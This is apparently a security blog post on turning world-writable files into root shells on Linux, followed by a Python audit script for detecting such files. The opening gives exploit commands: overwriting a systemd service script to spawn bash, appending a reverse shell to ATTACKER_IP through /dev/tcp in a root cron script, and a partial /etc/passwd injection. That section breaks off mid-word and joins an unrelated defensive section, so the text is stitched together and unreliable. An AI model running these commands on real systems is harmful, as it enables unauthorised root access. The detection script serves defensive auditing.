
Day 29: Writable File Exploitation — Turning "Bad Permissions" into Root Shells 🕵️♂️
🛠️ The "Writable-to-Root" Pipeline

1. The Systemd Service Hijack

I audited a custom service file in /etc/systemd/system/app.service.

The Flaw: The ExecStart pointed to /opt/app.py, which was world-writable (-rwxrwxrwx).

The Exploit: echo 'import os; os.system("/bin/bash")' > /opt/app.py

The Trigger: systemctl restart app. Since the service manager (systemd) runs as root, my injected bash shell spawned with full root privileges.

2. The Cron Job Injection

Automation is an attacker's best friend. I checked /etc/crontab and found a cleanup script running every minute.

The Exploit: Appending a reverse shell one-liner: echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /opt/cleanup.sh

The Result: Within 60 seconds, the system automatically pushed a root shell to my listener.

3. Overwriting /etc/passwd (The Nuclear Option)

In rare, critical misconfigurations where /etc/passwd is world-writable:

The Exploit: Create a new user hash: openssl passwd -1 mypassword.

The Injection: Append hac
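All three paths above share one root cause: a file that root-owned automation executes or trusts is writable by everyone. The audit script below is an added example written for this post, not code from the original author. It parses systemd unit text for Exec* directives and /etc/crontab-style lines, then reports any root-run program (or sensitive file such as /etc/passwd) whose mode grants "others" write access. The unit-file and crontab contents, the file names under the temp directory, and the 0777/0755/0644 modes in demo() are all constructed stand-ins for /opt/app.py, /opt/cleanup.sh and /etc/passwd, so the script runs offline without touching the real system.

```python
#!/usr/bin/env python3
"""Audit for the 'writable-to-root' pattern (added example, not the post's code).

Flags every root-run program named in systemd Exec* lines or /etc/crontab whose
file is world-writable, plus sensitive files (default /etc/passwd) with the same
defect. demo() builds a constructed sandbox in a temp directory and audits it.
"""
import os
import re
import shutil
import stat
import tempfile

# Exec* directives of a unit file; '-', '@', '+', '!', ':' are systemd prefix modifiers.
EXEC_RE = re.compile(
    r"^[ \t]*Exec(?:Start|StartPre|StartPost|Reload|Stop|StopPost)[ \t]*=[ \t]*[-@+!:]*(.*)$",
    re.M,
)


def abs_paths(command):
    """Absolute-path tokens of a command line (interpreter and script alike)."""
    return [tok for tok in command.split() if tok.startswith("/")]


def exec_targets(unit_text):
    """Every absolute path on Exec* lines, e.g. both /usr/bin/python3 and /opt/app.py."""
    paths = []
    for match in EXEC_RE.finditer(unit_text):
        paths.extend(abs_paths(match.group(1)))
    return paths


def cron_commands(crontab_text):
    """(user, command) pairs from /etc/crontab lines; comments and VAR=value lines skipped."""
    pairs = []
    for line in crontab_text.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith("#") or "=" in fields[0]:
            continue
        if fields[0].startswith("@") and len(fields) >= 3:   # @reboot user command
            pairs.append((fields[1], " ".join(fields[2:])))
        elif len(fields) >= 7:                                # m h dom mon dow user command
            pairs.append((fields[5], " ".join(fields[6:])))
    return pairs


def is_world_writable(path):
    """True when the file exists and 'others' hold the write bit (the -rwxrwxrwx case)."""
    try:
        mode = os.stat(path).st_mode
    except OSError:
        return False
    return bool(mode & stat.S_IWOTH)


def audit(units, crontab_text, sensitive=("/etc/passwd",)):
    """Sorted (source, path) findings. units maps unit-file name -> unit-file text."""
    findings = set()
    for name, text in units.items():
        findings.update((name, p) for p in exec_targets(text) if is_world_writable(p))
    for user, command in cron_commands(crontab_text):
        if user == "root":  # only root's jobs turn a writable script into root code
            findings.update(("crontab", p) for p in abs_paths(command) if is_world_writable(p))
    findings.update(("sensitive", p) for p in sensitive if is_world_writable(p))
    return sorted(findings)


def demo():
    """Constructed sandbox: writable stand-ins for /opt/app.py and /opt/cleanup.sh,
    a sanely permissioned helper, and a 0644 passwd file. Returns the findings."""
    root = tempfile.mkdtemp(prefix="ww-audit-")
    try:
        modes = {"app.py": 0o777, "cleanup.sh": 0o777, "backup.sh": 0o755, "passwd": 0o644}
        paths = {}
        for name, mode in modes.items():
            paths[name] = os.path.join(root, name)
            with open(paths[name], "w") as fh:
                fh.write("#!/bin/sh\n")  # placeholder content; only the mode matters here
            os.chmod(paths[name], mode)
        units = {"app.service": f"[Service]\nExecStart={paths['app.py']}\n"}
        crontab = ("SHELL=/bin/sh\n"
                   f"* * * * * root {paths['cleanup.sh']}\n"
                   f"0 3 * * * root /bin/sh {paths['backup.sh']}\n")
        return audit(units, crontab, sensitive=(paths["passwd"],))
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for source, path in demo():
        print(f"[!] {source}: {path} is world-writable")
```

Run it on a live host by feeding `audit()` the text of each file under /etc/systemd/system and of /etc/crontab (plus /etc/cron.d if you use it); the fix for every hit is the same: `chmod o-w` on the file and the directories above it, then confirm the owner is root. The same audit works as a periodic detection by diffing successive outputs.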
Continue reading on Dev.to Tutorial